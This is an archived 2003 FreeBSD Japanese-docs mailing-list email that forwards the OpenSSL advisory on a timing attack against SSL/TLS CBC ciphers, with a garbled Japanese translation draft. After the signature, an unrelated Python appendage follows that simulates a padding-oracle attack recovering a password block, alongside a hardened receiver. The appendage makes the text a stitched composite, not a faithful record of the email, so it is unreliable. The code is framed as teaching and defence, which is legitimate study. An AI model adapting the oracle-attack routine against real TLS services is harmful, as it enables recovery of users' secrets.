From owner-doc-jp-work@jp.FreeBSD.org Sun Feb 23 18:10:16 2003
Received: (from daemon@localhost)
	by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) id h1N9AG853293;
	Sun, 23 Feb 2003 18:10:16 +0900 (JST)
	(envelope-from owner-doc-jp-work@jp.FreeBSD.org)
Received: from smtp.eos.ocn.ne.jp (eos.ocn.ne.jp [211.6.83.117])
	by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) with ESMTP/inet id h1N9AGi53288
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:10:16 +0900 (JST)
	(envelope-from hrs@eos.ocn.ne.jp)
Received: from mail.allbsd.org (p30156-adsao12honb4-acca.tokyo.ocn.ne.jp [219.161.183.156])
	by smtp.eos.ocn.ne.jp (Postfix) with ESMTP id 99E4E3808
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:10:15 +0900 (JST)
Received: from localhost (alph.allbsd.org [192.168.0.10])
	by mail.allbsd.org (8.12.6/3.7W/DomainMaster) with ESMTP id h1N99PJ8094672
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:09:26 +0900 (JST)
	(envelope-from hrs@eos.ocn.ne.jp)
Message-Id: <20030223.180916.71084227.hrs@eos.ocn.ne.jp>
To: doc-jp-work@jp.FreeBSD.org
From: Hiroki Sato <hrs@eos.ocn.ne.jp>
X-PGPkey-fingerprint: BDB3 443F A5DD B3D0 A530  FFD7 4F2C D3D8 2793 CF2D
X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit
Reply-To: doc-jp-work@jp.FreeBSD.org
Precedence: list
Date: Sun, 23 Feb 2003 18:09:16 +0900
X-Sequence: doc-jp-work 595
Subject: [doc-jp-work 595] OpenSSL advisory
Errors-To: owner-doc-jp-work@jp.FreeBSD.org
Sender: owner-doc-jp-work@jp.FreeBSD.org
X-Originator: hrs@eos.ocn.ne.jp
X-Distribute: distribute version 2.1 (Alpha) patchlevel 24e+030107

$B:4F#!wEl5~M}2JBg3X$G$9!#(B

 $B$^$b$J$/(B OpenSSL $B4XO"$N4+9p$,=P$k$N$G$9$,!"(B
 $BK]Lu$NCY$l$r$J$k$Y$/>.$5$/$7$h$&1?F0$rE83+Cf$J$N$G!"(B
 $B>pJs8;$G$"$k(B

  http://www.openssl.org/news/secadv_20030219.txt

 $B$N35MW@bL@ItJ,$@$1@h$K=P$7$F$*$-$^$9!#(B
 $BJQ$JItJ,$,$"$C$?$i;XE&$/$@$5$$!#(B

----($B$3$3$+$i(B)

Vulnerability
-------------

In an upcoming paper, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge
Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion) describe and
demonstrate a timing-based attack on CBC ciphersuites in SSL and TLS.

  [Japanese translation, given here in English] In a paper to be published
  shortly, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge Vaudenay (EPFL)
  and Martin Vuagnoux (EPFL, Ilion) describe and demonstrate a timing-based
  method of attack on the CBC ciphers included in SSL and TLS.

The attack assumes that multiple SSL or TLS connections involve a
common fixed plaintext block, such as a password.  An active attacker
can substitute specifically made-up ciphertext blocks for blocks sent
by legitimate SSL/TLS parties and measure the time until a response
arrives: SSL/TLS includes data authentication to ensure that such
modified ciphertext blocks will be rejected by the peer (and the
connection aborted), but the attacker may be able to use timing
observations to distinguish between two different error cases, namely
block cipher padding errors and MAC verification errors.  This is
sufficient for an adaptive attack that finally can obtain the complete
plaintext block.

  $B$3$N967b$O!"J#?t$N(B SSL $B$b$7$/$O(B TLS $B$N@\B3$K$*$$$F!"%Q%9%o!<%I$J$I(B
  $BFbMF$,8GDj$NJ?J8%V%m%C%/$,6&DL$G;H$o$l$k$3$H$rA0Ds$H$7$?$b$N$G$9!#(B
  $B967b$r3+;O$9$kB&$+$i$O!"@55,$N(B SSL/TLS $BAw?.<T$,Aw?.$7$?%V%m%C%/$rAu$C$F(B
  $BFCJL$K:n@.$7$?0E9fJ8%V%m%C%/$rAw$j!"H?1~$,E~Ce$9$k$^$G$N;~4V$r7WB,$9$k$3$H$,(B
  $B2DG=$G$9!#(BSSL/TLS $B$K$O!"$=$N$h$&$K2~$6$s$5$l$?0E9fJ8%V%m%C%/$,<u?.B&$G(B
  $B@5$7$/GK4~$5$l$k(B ($B$=$7$F@\B3$r@ZCG$9$k(B) $B$h$&!"%G!<%?G'>Z$,(B
  $B4^$^$l$F$$$k$N$G$9$,!"967b<T$O$=$NH?1~;~4V$N7WB,7k2L$+$i!"(B
  $B!V2?$,860x$G%V%m%C%/$,GK4~$5$l$?$N$+!W$H$$$&!"$=$N:]$K9M$($i$l$k(B
  2 $B<oN`$N%1!<%9!"$D$^$j!V%V%m%C%/0E9f$N%Q%G%#%s%0%(%i!<(B (block cipher
  padding error)$B!W$J$N$+!"!V(BMAC $B8!>Z%(%i!<(B (MAC verification error)$B!W$J$N$+$r(B
  $B6hJL$9$k$3$H$,$G$-$k2DG=@-$,$"$j$^$9!#$3$N;v<B$O!"40A4$JJ?J8%V%m%C%/$r(B
  $B3MF@$G$-$k!"$"$k<o$NE,1~967b$r9T$J$&>e$G==J,$J>pJs8;$K$J$j$^$9!#(B

--
| $B:4F#(B $B9-@8!wEl5~M}2JBg3X(B <hrs@eos.ocn.ne.jp>
|                         <hrs@FreeBSD.org> (FreeBSD Project)
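To make the two error paths described in the advisory text above concrete, here is an added worked example; it is my own code, not part of the advisory, the paper, or OpenSSL. It models a TLS 1.0 style CBC record as plaintext || MAC || padding, with a toy Feistel cipher standing in for the real block cipher (an assumption; the attack never needs to break the cipher) and a constructed request whose second 16-byte block plays the role of the fixed password block. The receiver's error code stands in for the response latency a real attacker measures. `decrypt_record_vulnerable` rejects bad padding before doing any MAC work; `recover_block` shows how an attacker who can tell that fast rejection from a MAC failure recovers the block one byte at a time, spending one fresh connection per query and sending the same target block preceded by a block XORed with a chosen delta, so that the receiver always decrypts it to P_target XOR delta regardless of the session key. `decrypt_record_hardened` applies the usual countermeasure of computing a MAC even when the padding is wrong and returning a single error, and the same attack then learns nothing. All function names and the sample request are mine.

```python
import hashlib
import hmac
import os

BLOCK, MAC_LEN = 16, 16
PADDING_ERROR, MAC_ERROR, BAD_RECORD, OK = "bad_padding", "bad_mac", "bad_record_mac", "ok"

# Constructed sample request; its second block ("ord=Tr0ub4dor&3!") is the fixed block.
SECRET_REQUEST = b"user=alice&password=Tr0ub4dor&3!"
TARGET_BLOCK = 2  # position in the record: 0 = IV, 1 = first data block, 2 = second

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key, block):
    # Toy 4-round Feistel cipher on 16-byte blocks (assumed stand-in for the real cipher).
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def encrypt_record(enc_key, mac_key, plaintext):
    # TLS 1.0 style: CBC(plaintext || MAC || padding), padding = n+1 bytes all equal to n.
    mac = hmac.new(mac_key, plaintext, hashlib.sha256).digest()[:MAC_LEN]
    n = BLOCK - (len(plaintext) + MAC_LEN) % BLOCK - 1
    padded = plaintext + mac + bytes([n]) * (n + 1)
    out = [os.urandom(BLOCK)]  # explicit IV carried as the first block
    for i in range(0, len(padded), BLOCK):
        out.append(block_encrypt(enc_key, _xor(padded[i:i + BLOCK], out[-1])))
    return b"".join(out)

def _cbc_decrypt(enc_key, record):
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    return b"".join(_xor(block_decrypt(enc_key, c), p) for p, c in zip(blocks, blocks[1:]))

def decrypt_record_vulnerable(enc_key, mac_key, record):
    # Vulnerable receiver: a padding error returns before any MAC work, so it is faster.
    padded = _cbc_decrypt(enc_key, record)
    n = padded[-1]
    if n + 1 + MAC_LEN > len(padded) or padded[-(n + 1):] != bytes([n]) * (n + 1):
        return PADDING_ERROR, None  # fast path, no MAC computed
    body = padded[:-(n + 1)]
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
    if not hmac.compare_digest(body[-MAC_LEN:], expected):
        return MAC_ERROR, None  # slow path, a full MAC computation happened first
    return OK, body[:-MAC_LEN]

def decrypt_record_hardened(enc_key, mac_key, record):
    # Countermeasure: always compute a MAC and report one error, so timing is uniform.
    padded = _cbc_decrypt(enc_key, record)
    n = padded[-1]
    pad_ok = n + 1 + MAC_LEN <= len(padded) and padded[-(n + 1):] == bytes([n]) * (n + 1)
    body = padded[:-(n + 1)] if pad_ok else padded[:-1]  # assume minimal padding if bad
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
    mac_ok = hmac.compare_digest(body[-MAC_LEN:], expected)
    return (OK, body[:-MAC_LEN]) if pad_ok and mac_ok else (BAD_RECORD, None)

def query(server_decrypt, secret, delta):
    # One connection per adaptive query: fresh keys, same fixed plaintext. XORing delta
    # into the block before the target makes the receiver see P_target XOR delta for any
    # key. The error code stands in for the latency the real attacker would measure.
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    record = encrypt_record(enc_key, mac_key, secret)
    c_prev, c_target = (record[k * BLOCK:(k + 1) * BLOCK] for k in (TARGET_BLOCK - 1, TARGET_BLOCK))
    forged = bytes(BLOCK) * 2 + _xor(c_prev, delta) + c_target  # filler blocks so a MAC fits
    err, _ = server_decrypt(enc_key, mac_key, forged)
    return "slow" if err == MAC_ERROR else "fast"

def recover_block(server_decrypt, secret=SECRET_REQUEST):
    # Adaptive recovery of the target block, last byte first (Vaudenay-style oracle).
    known = b""
    for j in range(BLOCK):
        tail = bytes(b ^ j for b in known)  # make the already-known bytes read as pad value j
        found = None
        for g in range(256):
            delta = bytes(BLOCK - j - 1) + bytes([g ^ j]) + tail
            if query(server_decrypt, secret, delta) != "slow":
                continue
            if j == 0:  # a slow reply may also be padding 01 01; a 00 pad-length byte
                probe = bytearray(delta)  # survives disturbing the byte before it
                probe[-2] ^= 0x80
                if query(server_decrypt, secret, bytes(probe)) != "slow":
                    continue
            found = g
            break
        if found is None:
            return None  # no timing difference observed: countermeasure in place
        known = bytes([found]) + known
    return known
```

Against the vulnerable receiver `recover_block(decrypt_record_vulnerable)` returns b"ord=Tr0ub4dor&3!" after roughly 1,200 simulated connections; against the hardened one it returns None. In a real deployment the timing difference is buried in network jitter, so each guess needs repeated measurements, and every query aborts a connection; that is why the attack depends on the same plaintext block recurring across many connections, exactly the assumption the advisory states.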
